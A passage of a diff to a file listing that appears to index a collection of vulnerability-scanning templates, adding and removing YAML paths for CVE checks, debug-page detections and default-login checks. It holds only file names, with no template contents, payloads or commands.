-./poc/cve/cve-2021-24300(1).yaml ./poc/cve/cve-2021-24316-5689.yaml ./poc/cve/cve-2021-24316-5690.yaml ./poc/cve/cve-2021-24316-5691.yaml @@ -40792,10 +40824,10 @@ ./poc/cve/cve-2021-24340-5708.yaml ./poc/cve/cve-2021-24340-5709.yaml ./poc/cve/cve-2021-24340-5710.yaml -./poc/cve/cve-2021-24340-5711.yaml ./poc/cve/cve-2021-24340-5712.yaml ./poc/cve/cve-2021-24342-5713.yaml ./poc/cve/cve-2021-24342-5714.yaml +./poc/cve/cve-2021-24342-5715.yaml ./poc/cve/cve-2021-24358-5716.yaml ./poc/cve/cve-2021-24358-5717.yaml ./poc/cve/cve-2021-24358-5718.yaml @@ -40816,7 +40848,6 @@ ./poc/cve/cve-2021-24406-5733.yaml ./poc/cve/cve-2021-24406-5734.yaml ./poc/cve/cve-2021-24406-5735.yaml -./poc/cve/cve-2021-24406-5736.yaml ./poc/cve/cve-2021-24406-5737.yaml ./poc/cve/cve-2021-24406-5738.yaml ./poc/cve/cve-2021-24406-5739.yaml @@ -40824,6 +40855,7 @@ ./poc/cve/cve-2021-24407-5741.yaml ./poc/cve/cve-2021-24407-5742.yaml ./poc/cve/cve-2021-24472-5743.yaml +./poc/cve/cve-2021-24472-5744.yaml ./poc/cve/cve-2021-24472-5745.yaml ./poc/cve/cve-2021-24472-5746.yaml ./poc/cve/cve-2021-24488(1).yaml @@ -40863,7 +40895,6 @@ ./poc/cve/cve-2021-24997-5780.yaml ./poc/cve/cve-2021-24997-5781.yaml ./poc/cve/cve-2021-24997-5782.yaml -./poc/cve/cve-2021-25008(1).yaml ./poc/cve/cve-2021-25028-5783.yaml ./poc/cve/cve-2021-25028-5784.yaml ./poc/cve/cve-2021-25028-5785.yaml @@ -40876,6 +40907,7 @@ ./poc/cve/cve-2021-25052-5791.yaml ./poc/cve/cve-2021-25055-5792.yaml ./poc/cve/cve-2021-25055-5793.yaml +./poc/cve/cve-2021-25063-5794.yaml ./poc/cve/cve-2021-25063-5795.yaml ./poc/cve/cve-2021-25063-5796.yaml ./poc/cve/cve-2021-25074-5797.yaml @@ -40883,12 +40915,12 @@ ./poc/cve/cve-2021-25074-5799.yaml ./poc/cve/cve-2021-25074-5800.yaml ./poc/cve/cve-2021-25075(1).yaml -./poc/cve/cve-2021-25085(1).yaml ./poc/cve/cve-2021-25111-5801.yaml ./poc/cve/cve-2021-25111-5802.yaml ./poc/cve/cve-2021-25111-5803.yaml ./poc/cve/cve-2021-25112-5804.yaml ./poc/cve/cve-2021-25112-5805.yaml +./poc/cve/cve-2021-25118(1).yaml ./poc/cve/cve-2021-25120(1).yaml ./poc/cve/cve-2021-25120-5806.yaml ./poc/cve/cve-2021-25281-5807.yaml @@ -40962,6 +40994,7 @@ ./poc/cve/cve-2021-26475-5863.yaml ./poc/cve/cve-2021-26598-5864.yaml ./poc/cve/cve-2021-26598-5865.yaml +./poc/cve/cve-2021-26702(1).yaml ./poc/cve/cve-2021-26710-5866.yaml ./poc/cve/cve-2021-26710-5867.yaml ./poc/cve/cve-2021-26710-5868.yaml @@ -40980,6 +41013,7 @@ ./poc/cve/cve-2021-26723-5881.yaml ./poc/cve/cve-2021-26812-5882.yaml ./poc/cve/cve-2021-26812-5883.yaml +./poc/cve/cve-2021-26812-5884.yaml ./poc/cve/cve-2021-26812-5885.yaml ./poc/cve/cve-2021-26855-5886.yaml ./poc/cve/cve-2021-26855-5887.yaml @@ -40995,6 +41029,7 @@ ./poc/cve/cve-2021-27132-5897.yaml ./poc/cve/cve-2021-27132-5898.yaml ./poc/cve/cve-2021-27132.yaml +./poc/cve/cve-2021-27309(1).yaml ./poc/cve/cve-2021-27310-5899.yaml ./poc/cve/cve-2021-27310-5900.yaml ./poc/cve/cve-2021-27330-5901.yaml @@ -41018,6 +41053,7 @@ ./poc/cve/cve-2021-27651-5919.yaml ./poc/cve/cve-2021-27651-5920.yaml ./poc/cve/cve-2021-27651-5921.yaml +./poc/cve/cve-2021-27748(1).yaml ./poc/cve/cve-2021-27748-5922.yaml ./poc/cve/cve-2021-27850-5923.yaml ./poc/cve/cve-2021-27850-5924.yaml @@ -41069,7 +41105,6 @@ ./poc/cve/cve-2021-28169-5961.yaml ./poc/cve/cve-2021-28169-5962.yaml ./poc/cve/cve-2021-28169-5963.yaml -./poc/cve/cve-2021-28377(1).yaml ./poc/cve/cve-2021-28377-5964.yaml ./poc/cve/cve-2021-28377-5965.yaml ./poc/cve/cve-2021-28377-5966.yaml @@ -41078,6 +41113,7 @@ ./poc/cve/cve-2021-28854-5969.yaml ./poc/cve/cve-2021-28854-5970.yaml ./poc/cve/cve-2021-28854-5971.yaml +./poc/cve/cve-2021-28854-5972.yaml ./poc/cve/cve-2021-28854-5973.yaml ./poc/cve/cve-2021-28918-1.yaml ./poc/cve/cve-2021-28918-2.yaml @@ -41122,7 +41158,6 @@ ./poc/cve/cve-2021-29484-6008.yaml ./poc/cve/cve-2021-29490-6009.yaml ./poc/cve/cve-2021-29490-6010.yaml -./poc/cve/cve-2021-29490-6011.yaml ./poc/cve/cve-2021-29622-6012.yaml ./poc/cve/cve-2021-29622-6013.yaml ./poc/cve/cve-2021-29622-6014.yaml @@ -41153,6 +41188,7 @@ ./poc/cve/cve-2021-3017-6038.yaml ./poc/cve/cve-2021-3017-6039.yaml ./poc/cve/cve-2021-3017-6040.yaml +./poc/cve/cve-2021-3019-6041.yaml ./poc/cve/cve-2021-3019-6042.yaml ./poc/cve/cve-2021-3019-6043.yaml ./poc/cve/cve-2021-3019-6044.yaml @@ -41180,8 +41216,8 @@ ./poc/cve/cve-2021-31249-6065.yaml ./poc/cve/cve-2021-31249-6066.yaml ./poc/cve/cve-2021-31249-6067.yaml +./poc/cve/cve-2021-31249-6068.yaml ./poc/cve/cve-2021-31249-6069.yaml -./poc/cve/cve-2021-31250-6070.yaml ./poc/cve/cve-2021-31250-6071.yaml ./poc/cve/cve-2021-31250-6072.yaml ./poc/cve/cve-2021-31250-6073.yaml @@ -41193,6 +41229,7 @@ ./poc/cve/cve-2021-3129-6080.yaml ./poc/cve/cve-2021-3129-6081.yaml ./poc/cve/cve-2021-3129-6082.yaml +./poc/cve/cve-2021-3129.yaml ./poc/cve/cve-2021-31537-6083.yaml ./poc/cve/cve-2021-31537-6084.yaml ./poc/cve/cve-2021-31537-6085.yaml @@ -41218,7 +41255,6 @@ ./poc/cve/cve-2021-31682-6103.yaml ./poc/cve/cve-2021-31682-6104.yaml ./poc/cve/cve-2021-31755-6105.yaml -./poc/cve/cve-2021-31755-6106.yaml ./poc/cve/cve-2021-31755-6107.yaml ./poc/cve/cve-2021-31755-6108.yaml ./poc/cve/cve-2021-31755-6109.yaml @@ -41226,6 +41262,7 @@ ./poc/cve/cve-2021-31800-6111.yaml ./poc/cve/cve-2021-31800-6112.yaml ./poc/cve/cve-2021-31800-6113.yaml +./poc/cve/cve-2021-31805(1).yaml ./poc/cve/cve-2021-31856-6114.yaml ./poc/cve/cve-2021-31856-6115.yaml ./poc/cve/cve-2021-31856-6116.yaml @@ -41237,8 +41274,6 @@ ./poc/cve/cve-2021-32030-6122.yaml ./poc/cve/cve-2021-32030-6123.yaml ./poc/cve/cve-2021-32172-6125.yaml -./poc/cve/cve-2021-32172-6126.yaml -./poc/cve/cve-2021-3223(1).yaml ./poc/cve/cve-2021-3223-6127.yaml ./poc/cve/cve-2021-3223-6128.yaml ./poc/cve/cve-2021-3223-6129.yaml @@ -41260,6 +41295,7 @@ ./poc/cve/cve-2021-32819-6145.yaml ./poc/cve/cve-2021-32819-6146.yaml ./poc/cve/cve-2021-32819-6147.yaml +./poc/cve/cve-2021-32820-6148.yaml ./poc/cve/cve-2021-32820-6149.yaml ./poc/cve/cve-2021-32820-6150.yaml ./poc/cve/cve-2021-32820-6151.yaml @@ -41351,7 +41387,6 @@ ./poc/cve/cve-2021-34621-6235.yaml ./poc/cve/cve-2021-34640-6236.yaml ./poc/cve/cve-2021-34640-6237.yaml -./poc/cve/cve-2021-34643-6238.yaml ./poc/cve/cve-2021-34643-6239.yaml ./poc/cve/cve-2021-34805-6240.yaml ./poc/cve/cve-2021-34805-6241.yaml @@ -41360,12 +41395,12 @@ ./poc/cve/cve-2021-35265-1.yaml ./poc/cve/cve-2021-35265-2.yaml ./poc/cve/cve-2021-35265-6244.yaml +./poc/cve/cve-2021-35265-6245.yaml ./poc/cve/cve-2021-35265-6246.yaml ./poc/cve/cve-2021-35336-6248.yaml ./poc/cve/cve-2021-35336-6249.yaml ./poc/cve/cve-2021-35464-6250.yaml ./poc/cve/cve-2021-35464-6251.yaml -./poc/cve/cve-2021-35464-6252.yaml ./poc/cve/cve-2021-35464-6253.yaml ./poc/cve/cve-2021-35464-6254.yaml ./poc/cve/cve-2021-35464-6255.yaml @@ -41396,6 +41431,7 @@ ./poc/cve/cve-2021-37216-6280.yaml ./poc/cve/cve-2021-37216-6281.yaml ./poc/cve/cve-2021-37216-6282.yaml +./poc/cve/cve-2021-37416(1).yaml ./poc/cve/cve-2021-37538-6283.yaml ./poc/cve/cve-2021-37538-6284.yaml ./poc/cve/cve-2021-37538-6285.yaml @@ -41406,7 +41442,6 @@ ./poc/cve/cve-2021-37573-6290.yaml ./poc/cve/cve-2021-37580-6291.yaml ./poc/cve/cve-2021-37580-6292.yaml -./poc/cve/cve-2021-37589(1).yaml ./poc/cve/cve-2021-37704-2.yaml ./poc/cve/cve-2021-37704-6293.yaml ./poc/cve/cve-2021-37704-6294.yaml @@ -41435,7 +41470,6 @@ ./poc/cve/cve-2021-38702-6311.yaml ./poc/cve/cve-2021-38702-6312.yaml ./poc/cve/cve-2021-38702-6313.yaml -./poc/cve/cve-2021-38702-6314.yaml ./poc/cve/cve-2021-38704-6315.yaml ./poc/cve/cve-2021-38704-6316.yaml ./poc/cve/cve-2021-38704-6317.yaml @@ -41444,7 +41478,6 @@ ./poc/cve/cve-2021-38751-6320.yaml ./poc/cve/cve-2021-38751-6321.yaml ./poc/cve/cve-2021-38751-6322.yaml -./poc/cve/cve-2021-39211(1).yaml ./poc/cve/cve-2021-39226-6324.yaml ./poc/cve/cve-2021-39226-6325.yaml ./poc/cve/cve-2021-39226-6326.yaml @@ -41468,6 +41501,7 @@ ./poc/cve/cve-2021-39327-6341.yaml ./poc/cve/cve-2021-39327-6342.yaml ./poc/cve/cve-2021-39350-6343.yaml +./poc/cve/cve-2021-39350-6344.yaml ./poc/cve/cve-2021-39350-6345.yaml ./poc/cve/cve-2021-39433-6346.yaml ./poc/cve/cve-2021-39433-6347.yaml @@ -41493,6 +41527,7 @@ ./poc/cve/cve-2021-40438-6365.yaml ./poc/cve/cve-2021-40539-6366.yaml ./poc/cve/cve-2021-40539-6367.yaml +./poc/cve/cve-2021-40539-6368.yaml ./poc/cve/cve-2021-40539-6369.yaml ./poc/cve/cve-2021-40539-6370.yaml ./poc/cve/cve-2021-40539-6371.yaml @@ -41500,6 +41535,7 @@ ./poc/cve/cve-2021-40542-6373.yaml ./poc/cve/cve-2021-40542-6374.yaml ./poc/cve/cve-2021-40542-6375.yaml +./poc/cve/cve-2021-40822(1).yaml ./poc/cve/cve-2021-40822-6376.yaml ./poc/cve/cve-2021-40856-6377.yaml ./poc/cve/cve-2021-40856-6378.yaml @@ -41535,6 +41571,7 @@ ./poc/cve/cve-2021-41174-6406.yaml ./poc/cve/cve-2021-41174-6407.yaml ./poc/cve/cve-2021-41174-6408.yaml +./poc/cve/cve-2021-41174-6409.yaml ./poc/cve/cve-2021-41174-6410.yaml ./poc/cve/cve-2021-41192-6411.yaml ./poc/cve/cve-2021-41192-6412.yaml @@ -41567,7 +41604,6 @@ ./poc/cve/cve-2021-41467-6440.yaml ./poc/cve/cve-2021-41467-6441.yaml ./poc/cve/cve-2021-41467-6442.yaml -./poc/cve/cve-2021-41569(1).yaml ./poc/cve/cve-2021-41569-6443.yaml ./poc/cve/cve-2021-41569-6444.yaml ./poc/cve/cve-2021-41648-6445.yaml @@ -41585,6 +41621,7 @@ ./poc/cve/cve-2021-41653-6457.yaml ./poc/cve/cve-2021-41653-6458.yaml ./poc/cve/cve-2021-41691-6459.yaml +./poc/cve/cve-2021-41691-6460.yaml ./poc/cve/cve-2021-41691-6461.yaml ./poc/cve/cve-2021-41773-6462.yaml ./poc/cve/cve-2021-41773-6463.yaml @@ -41621,6 +41658,7 @@ ./poc/cve/cve-2021-42071-6492.yaml ./poc/cve/cve-2021-42071-6493.yaml ./poc/cve/cve-2021-42071-6494.yaml +./poc/cve/cve-2021-42192(1).yaml ./poc/cve/cve-2021-42237-6495.yaml ./poc/cve/cve-2021-42237-6496.yaml ./poc/cve/cve-2021-42237-6497.yaml @@ -41673,7 +41711,6 @@ ./poc/cve/cve-2021-43810-6540.yaml ./poc/cve/cve-2021-43810-6541.yaml ./poc/cve/cve-2021-43810-6542.yaml -./poc/cve/cve-2021-44077(1).yaml ./poc/cve/cve-2021-44077-6543.yaml ./poc/cve/cve-2021-44103(1).yaml ./poc/cve/cve-2021-44103-6544.yaml @@ -41689,7 +41726,7 @@ ./poc/cve/cve-2021-44515(1).yaml ./poc/cve/cve-2021-44515-6554.yaml ./poc/cve/cve-2021-44521-6555.yaml -./poc/cve/cve-2021-44528(1).yaml +./poc/cve/cve-2021-44521-6556.yaml ./poc/cve/cve-2021-44528-6557.yaml ./poc/cve/cve-2021-44528-6558.yaml ./poc/cve/cve-2021-44528-6559.yaml @@ -41707,7 +41744,6 @@ ./poc/cve/cve-2021-45046-6571.yaml ./poc/cve/cve-2021-45046-6572.yaml ./poc/cve/cve-2021-45046-6573.yaml -./poc/cve/cve-2021-45046.yaml ./poc/cve/cve-2021-45092-6574.yaml ./poc/cve/cve-2021-45092-6575.yaml ./poc/cve/cve-2021-45092-6576.yaml @@ -41735,21 +41771,19 @@ ./poc/cve/cve-2021-46381-6598.yaml ./poc/cve/cve-2021-46381-6599.yaml ./poc/cve/cve-2021-46387-6600.yaml +./poc/cve/cve-2021-46387-6601.yaml ./poc/cve/cve-2021-46417-6602.yaml +./poc/cve/cve-2021-46422(1).yaml ./poc/cve/cve-2021-46424(1).yaml -./poc/cve/cve-2022-0140(1).yaml ./poc/cve/cve-2022-0140-6603.yaml ./poc/cve/cve-2022-0148-6604.yaml ./poc/cve/cve-2022-0148-6605.yaml ./poc/cve/cve-2022-0149-6606.yaml ./poc/cve/cve-2022-0149-6607.yaml ./poc/cve/cve-2022-0149-6608.yaml -./poc/cve/cve-2022-0165(1).yaml ./poc/cve/cve-2022-0165-6609.yaml ./poc/cve/cve-2022-0189-6610.yaml ./poc/cve/cve-2022-0189-6611.yaml -./poc/cve/cve-2022-0201(1).yaml -./poc/cve/cve-2022-0208(1).yaml ./poc/cve/cve-2022-0218-6612.yaml ./poc/cve/cve-2022-0218-6613.yaml ./poc/cve/cve-2022-0218-6614.yaml @@ -41762,7 +41796,6 @@ ./poc/cve/cve-2022-0346-6621.yaml ./poc/cve/cve-2022-0346-6622.yaml ./poc/cve/cve-2022-0378-6623.yaml -./poc/cve/cve-2022-0378-6624.yaml ./poc/cve/cve-2022-0378-6625.yaml ./poc/cve/cve-2022-0381-6626.yaml ./poc/cve/cve-2022-0381-6627.yaml @@ -41775,46 +41808,46 @@ ./poc/cve/cve-2022-0482-6633.yaml ./poc/cve/cve-2022-0482-6634.yaml ./poc/cve/cve-2022-0540(1).yaml +./poc/cve/cve-2022-0543(1).yaml ./poc/cve/cve-2022-0543-6635.yaml ./poc/cve/cve-2022-0591-6636.yaml ./poc/cve/cve-2022-0591-6637.yaml -./poc/cve/cve-2022-0594(1).yaml ./poc/cve/cve-2022-0653-6638.yaml ./poc/cve/cve-2022-0653-6639.yaml ./poc/cve/cve-2022-0653-6640.yaml ./poc/cve/cve-2022-0653-6641.yaml -./poc/cve/cve-2022-0656(1).yaml ./poc/cve/cve-2022-0656-6642.yaml ./poc/cve/cve-2022-0692-6643.yaml ./poc/cve/cve-2022-0692-6644.yaml ./poc/cve/cve-2022-0692-6645.yaml ./poc/cve/cve-2022-0692-6646.yaml -./poc/cve/cve-2022-0776(1).yaml ./poc/cve/cve-2022-0870(1).yaml -./poc/cve/cve-2022-0963(1).yaml -./poc/cve/cve-2022-0963.yaml -./poc/cve/cve-2022-0968(1).yaml +./poc/cve/cve-2022-0952(1).yaml +./poc/cve/cve-2022-1040(1).yaml ./poc/cve/cve-2022-1040-6647.yaml -./poc/cve/cve-2022-1054(1).yaml ./poc/cve/cve-2022-1119-6648.yaml +./poc/cve/cve-2022-1221(1).yaml +./poc/cve/cve-2022-1386(1).yaml ./poc/cve/cve-2022-1388-6649.yaml ./poc/cve/cve-2022-1388-6650.yaml ./poc/cve/cve-2022-1388.yaml ./poc/cve/cve-2022-1392-6651.yaml -./poc/cve/cve-2022-1597(1).yaml ./poc/cve/cve-2022-1597-6652.yaml ./poc/cve/cve-2022-1598-6653.yaml ./poc/cve/cve-2022-1598-6654.yaml +./poc/cve/cve-2022-1609(1).yaml ./poc/cve/cve-2022-1609-6655.yaml +./poc/cve/cve-2022-1713(1).yaml ./poc/cve/cve-2022-1713-6656.yaml +./poc/cve/cve-2022-1724(1).yaml ./poc/cve/cve-2022-1906(1).yaml +./poc/cve/cve-2022-1946(1).yaml ./poc/cve/cve-2022-21371-6657.yaml ./poc/cve/cve-2022-21371-6658.yaml ./poc/cve/cve-2022-21371-6659.yaml +./poc/cve/cve-2022-21500(1).yaml ./poc/cve/cve-2022-21500-6660.yaml -./poc/cve/cve-2022-2187(1).yaml ./poc/cve/cve-2022-22536-6661.yaml -./poc/cve/cve-2022-22536-6662.yaml ./poc/cve/cve-2022-22947-6663.yaml ./poc/cve/cve-2022-22947-6664.yaml ./poc/cve/cve-2022-22947-6665.yaml @@ -41825,12 +41858,10 @@ ./poc/cve/cve-2022-22963-6670.yaml ./poc/cve/cve-2022-22963-6671.yaml ./poc/cve/cve-2022-22963-6672.yaml -./poc/cve/cve-2022-22963.yaml ./poc/cve/cve-2022-22965-6673.yaml ./poc/cve/cve-2022-22965-6674.yaml ./poc/cve/cve-2022-22965-6675.yaml ./poc/cve/cve-2022-22965-6676.yaml -./poc/cve/cve-2022-22972(1).yaml ./poc/cve/cve-2022-22972-6677.yaml ./poc/cve/cve-2022-23131-6678.yaml ./poc/cve/cve-2022-23131-6679.yaml @@ -41859,7 +41890,6 @@ ./poc/cve/cve-2022-24112-6703.yaml ./poc/cve/cve-2022-24124-6704.yaml ./poc/cve/cve-2022-24124-6705.yaml -./poc/cve/cve-2022-24129(1).yaml ./poc/cve/cve-2022-24129-6706.yaml ./poc/cve/cve-2022-24129-6707.yaml ./poc/cve/cve-2022-24181(1).yaml @@ -41868,8 +41898,11 @@ ./poc/cve/cve-2022-24288-6710.yaml ./poc/cve/cve-2022-24288-6711.yaml ./poc/cve/cve-2022-24288-6712.yaml +./poc/cve/cve-2022-24681(1).yaml +./poc/cve/cve-2022-24856(1).yaml ./poc/cve/cve-2022-24856-6713.yaml -./poc/cve/cve-2022-2488(1).yaml +./poc/cve/cve-2022-2486(1).yaml +./poc/cve/cve-2022-2487(1).yaml ./poc/cve/cve-2022-24900-6714.yaml ./poc/cve/cve-2022-24990-6715.yaml ./poc/cve/cve-2022-24990-6716.yaml @@ -41883,7 +41916,6 @@ ./poc/cve/cve-2022-25369-6725.yaml ./poc/cve/cve-2022-25369-6726.yaml ./poc/cve/cve-2022-25369-6727.yaml -./poc/cve/cve-2022-26135(1).yaml ./poc/cve/cve-2022-26138-6728.yaml ./poc/cve/cve-2022-26148-6729.yaml ./poc/cve/cve-2022-26148-6730.yaml @@ -41891,17 +41923,16 @@ ./poc/cve/cve-2022-26159-6732.yaml ./poc/cve/cve-2022-26159-6733.yaml ./poc/cve/cve-2022-26233-6734.yaml +./poc/cve/cve-2022-26233-6735.yaml ./poc/cve/cve-2022-26233-6736.yaml ./poc/cve/cve-2022-26352-6737.yaml ./poc/cve/cve-2022-26352-6738.yaml -./poc/cve/cve-2022-26564(1).yaml ./poc/cve/cve-2022-26564-6739.yaml +./poc/cve/cve-2022-26960(1).yaml ./poc/cve/cve-2022-27849-6740.yaml ./poc/cve/cve-2022-27849-6741.yaml ./poc/cve/cve-2022-27927(1).yaml -./poc/cve/cve-2022-28079(1).yaml ./poc/cve/cve-2022-28079-6742.yaml -./poc/cve/cve-2022-28080(1).yaml ./poc/cve/cve-2022-28080-6743.yaml ./poc/cve/cve-2022-28363-6744.yaml ./poc/cve/cve-2022-28363-6745.yaml @@ -41909,40 +41940,44 @@ ./poc/cve/cve-2022-28365-6747.yaml ./poc/cve/cve-2022-29014-6748.yaml ./poc/cve/cve-2022-29298-6749.yaml +./poc/cve/cve-2022-29301(1).yaml ./poc/cve/cve-2022-29303-6750.yaml ./poc/cve/cve-2022-29303-6751.yaml ./poc/cve/cve-2022-29303-6752.yaml -./poc/cve/cve-2022-29383(1).yaml -./poc/cve/cve-2022-29464(1).yaml +./poc/cve/cve-2022-29455(1).yaml +./poc/cve/cve-2022-29455.yaml ./poc/cve/cve-2022-29464-6753.yaml ./poc/cve/cve-2022-29548(1).yaml ./poc/cve/cve-2022-29548-6754.yaml +./poc/cve/cve-2022-30073(1).yaml +./poc/cve/cve-2022-30489(1).yaml +./poc/cve/cve-2022-30525(1).yaml ./poc/cve/cve-2022-30525-6755.yaml -./poc/cve/cve-2022-30777(1).yaml -./poc/cve/cve-2022-31268(1).yaml +./poc/cve/cve-2022-30776(1).yaml ./poc/cve/cve-2022-31268-6756.yaml ./poc/cve/cve-2022-31268-6757.yaml ./poc/cve/cve-2022-32007(1).yaml ./poc/cve/cve-2022-32015(1).yaml ./poc/cve/cve-2022-32018(1).yaml ./poc/cve/cve-2022-32022(1).yaml +./poc/cve/cve-2022-32025(1).yaml +./poc/cve/cve-2022-32026(1).yaml ./poc/cve/cve-2022-32159.yaml ./poc/cve/cve-2022-32409-6758.yaml ./poc/cve/cve-2022-32444-6759.yaml ./poc/cve/cve-2022-32444-6760.yaml ./poc/cve/cve-2022-33174-6761.yaml -./poc/cve/cve-2022-34046(1).yaml ./poc/cve/cve-2022-34046-6762.yaml +./poc/cve/cve-2022-34047(1).yaml ./poc/cve/cve-2022-34047-6763.yaml ./poc/cve/cve-2022-34048(1).yaml -./poc/cve/cve-2022-34049(1).yaml -./poc/cve/cve-2022-36883(1).yaml +./poc/cve/cve-2022-35416(1).yaml ./poc/cve/cve-2022-40684(1).yaml +./poc/cve/cve-2022-42889.yaml ./poc/cve/cve-2023-2523.yaml ./poc/cve/cve-2023-33246.yaml ./poc/cve/cve-2023-34039.yaml ./poc/cve/cve-2024-23334.yaml -./poc/cve/cve-2024-23897.yaml ./poc/cve/cve-annotate.yml ./poc/cve/cve2json.yml ./poc/cve/cve_rce2-1.yaml @@ -42055,8 +42090,9 @@ ./poc/cve/rails-cve-2018-3760-rce.yml ./poc/cve/razor-cve-2018-8770.yml ./poc/cve/rce-CVE-2021-21224.yaml +./poc/cve/rce-cve-2021-41773.yaml ./poc/cve/rconfig-cve-2019-16663.yml -./poc/cve/resin-cnnvd-200705-315-9866.yaml +./poc/cve/resin-cnnvd-200705-315-9865.yaml ./poc/cve/resin-cnnvd-200705-315-9867.yaml ./poc/cve/resin-cnnvd-200705-315.yaml ./poc/cve/resin-cnnvd-200705-315.yml @@ -42123,23 +42159,23 @@ ./poc/debug/ampache-debug-page.yaml ./poc/debug/android-debug-database-exposed-312.yaml ./poc/debug/android-debug-database-exposed-313.yaml +./poc/debug/android-debug-database-exposed-314.yaml ./poc/debug/android-debug-database-exposed-315.yaml ./poc/debug/android-debug-database-exposed.yaml ./poc/debug/android-manifest-debuggable-enabled.yaml -./poc/debug/aspx-debug-mode-575.yaml ./poc/debug/aspx-debug-mode-576.yaml ./poc/debug/aspx-debug-mode-577.yaml ./poc/debug/aspx-debug-mode-578.yaml ./poc/debug/aspx-debug-mode-579.yaml +./poc/debug/aspx-debug-mode.yaml ./poc/debug/bitrix-debug-file.yaml -./poc/debug/browserless-debugger-794.yaml ./poc/debug/browserless-debugger-795.yaml ./poc/debug/checkGoDebug.yaml ./poc/debug/coldfusion-debug-xss-1.yaml ./poc/debug/coldfusion-debug-xss-1152.yaml +./poc/debug/coldfusion-debug-xss-1153.yaml ./poc/debug/coldfusion-debug-xss-1154.yaml ./poc/debug/coldfusion-debug-xss-2.yaml -./poc/debug/coldfusion-debug-xss.yaml ./poc/debug/configure-service-timestamps-debug.yaml ./poc/debug/debug-3c7881aeda959430760389337ec81437.yaml ./poc/debug/debug-assistant-2f45650a91c72711c9ed905e46c42126.yaml @@ -42154,7 +42190,6 @@ ./poc/debug/debug-bar-elasticpress-plugin.yaml ./poc/debug/debug-bar-elasticpress.yaml ./poc/debug/debug-bar.yaml -./poc/debug/debug-enabled-6788.yaml ./poc/debug/debug-enabled-6790.yaml ./poc/debug/debug-enabled.yaml ./poc/debug/debug-functions-time-2df258451ffd3064fdb981dedfeff909.yaml @@ -42180,7 +42215,6 @@ ./poc/debug/debug_log.yaml ./poc/debug/django-debug-detect-7024.yaml ./poc/debug/django-debug-detect-7025.yaml -./poc/debug/django-debug-detect-7026.yaml ./poc/debug/django-debug-detect-7027.yaml ./poc/debug/django-debug-detect.yaml ./poc/debug/django-debug-enable.yaml @@ -42193,7 +42227,7 @@ ./poc/debug/django-debug-exposure.yaml ./poc/debug/django-debug-toolbar.yaml ./poc/debug/django-debug-v2.yaml -./poc/debug/django-debug.yml +./poc/debug/django-debug.yaml ./poc/debug/django-debugmode-11848.yaml ./poc/debug/django-debugmode.yaml ./poc/debug/djangodebug.yaml @@ -42209,7 +42243,7 @@ ./poc/debug/firebase-debug-log.yaml ./poc/debug/flask-werkzeug-debug.yaml ./poc/debug/jboss-seam-debug-page-8238.yaml -./poc/debug/jboss-seam-debug-page-8239.yaml +./poc/debug/jboss-seam-debug-page-8240.yaml ./poc/debug/jboss-seam-debug-page.yaml ./poc/debug/lanhai-jifei-debug-rce.yaml ./poc/debug/lanhaizhuoyue-debug-rce.yaml @@ -42229,6 +42263,7 @@ ./poc/debug/npm-debug-log.yaml ./poc/debug/php-debug-bar-9504.yaml ./poc/debug/php-debug-bar-9506.yaml +./poc/debug/php-debug-bar-9507.yaml ./poc/debug/php-debug-bar.yaml ./poc/debug/php-debugbar-exposure.yaml ./poc/debug/php-symfony-debug.yaml @@ -42246,7 +42281,6 @@ ./poc/debug/struts-debug-mode-10560.yaml ./poc/debug/struts-debug-mode.yaml ./poc/debug/symfony-debug.yaml -./poc/debug/symfony-debugmode-10618.yaml ./poc/debug/symfony-debugmode-10619.yaml ./poc/debug/symfony-debugmode-10620.yaml ./poc/debug/symfony-debugmode-10621.yaml @@ -42254,20 +42288,20 @@ ./poc/debug/symfony-debugmode.yaml ./poc/debug/thinkphp-debug-detected.yaml ./poc/debug/typo3-debug-mode.yaml +./poc/debug/wamp-xdebug-detect-11100.yaml ./poc/debug/wamp-xdebug-detect-11101.yaml ./poc/debug/wamp-xdebug-detect-11102.yaml -./poc/debug/wamp-xdebug-detect-11103.yaml ./poc/debug/wamp-xdebug-detect-11104.yaml ./poc/debug/wamp-xdebug-detect.yaml ./poc/debug/wamp-xdebug.yaml ./poc/debug/werkzeug-debug.yaml ./poc/debug/werkzeug-debugger-detect-11195.yaml -./poc/debug/werkzeug-debugger-detect-11197.yaml +./poc/debug/werkzeug-debugger-detect-11196.yaml ./poc/debug/werkzeug-debugger-detect-11198.yaml ./poc/debug/werkzeug-debugger-detect.yaml ./poc/debug/wordpress-debug-log-11256.yaml ./poc/debug/wordpress-debug-log-11257.yaml -./poc/debug/wordpress-debug-log-11258.yaml +./poc/debug/wordpress-debug-log-11259.yaml ./poc/debug/wordpress-debug-log.yaml ./poc/debug/wp-debug-log.yaml ./poc/debug/wp-debugging-0c12452c85fb9700ac837eef51c78541.yaml @@ -42280,9 +42314,9 @@ ./poc/debug/wp-debugging.yaml ./poc/debug/xdebug.yaml ./poc/debug/yii-debugger-1.yaml +./poc/debug/yii-debugger-11738.yaml ./poc/debug/yii-debugger-11739.yaml ./poc/debug/yii-debugger-11740.yaml -./poc/debug/yii-debugger-11741.yaml ./poc/debug/yii-debugger-2.yaml ./poc/debug/yii-debugger-3.yaml ./poc/debug/yii-debugger-4.yaml @@ -42294,11 +42328,11 @@ ./poc/default/Kingsoft-default-login.yaml ./poc/default/Konga-default-login.yaml ./poc/default/MinIO-default-login.yaml -./poc/default/activemq-default-login-44.yaml ./poc/default/activemq-default-login-45.yaml ./poc/default/activemq-default-login-46.yaml ./poc/default/activemq-default-login-47.yaml ./poc/default/activemq-default-login-48.yaml +./poc/default/activemq-default-login.yaml ./poc/default/activemq-default-password.yaml ./poc/default/activemq-default-password.yml ./poc/default/adobe-aem-default-credentials-1.yaml @@ -42316,8 +42350,8 @@ ./poc/default/aem-default-get-servlet-11.yaml ./poc/default/aem-default-get-servlet-12.yaml ./poc/default/aem-default-get-servlet-13.yaml -./poc/default/aem-default-get-servlet-135.yaml ./poc/default/aem-default-get-servlet-136.yaml +./poc/default/aem-default-get-servlet-137.yaml ./poc/default/aem-default-get-servlet-139.yaml ./poc/default/aem-default-get-servlet-14.yaml ./poc/default/aem-default-get-servlet-15.yaml @@ -42371,6 +42405,7 @@ ./poc/default/aem-default-get-servlet-8.yaml ./poc/default/aem-default-get-servlet-9.yaml ./poc/default/aem-default-get-servlet.yaml +./poc/default/aem-default-login-140.yaml ./poc/default/aem-default-login-141.yaml ./poc/default/aem-default-login-142.yaml ./poc/default/airflow-default-credentials.yaml @@ -42379,10 +42414,12 @@ ./poc/default/alibaba-canal-default-password-262.yaml ./poc/default/alibaba-canal-default-password.yaml ./poc/default/alibaba-canal-default-password.yml 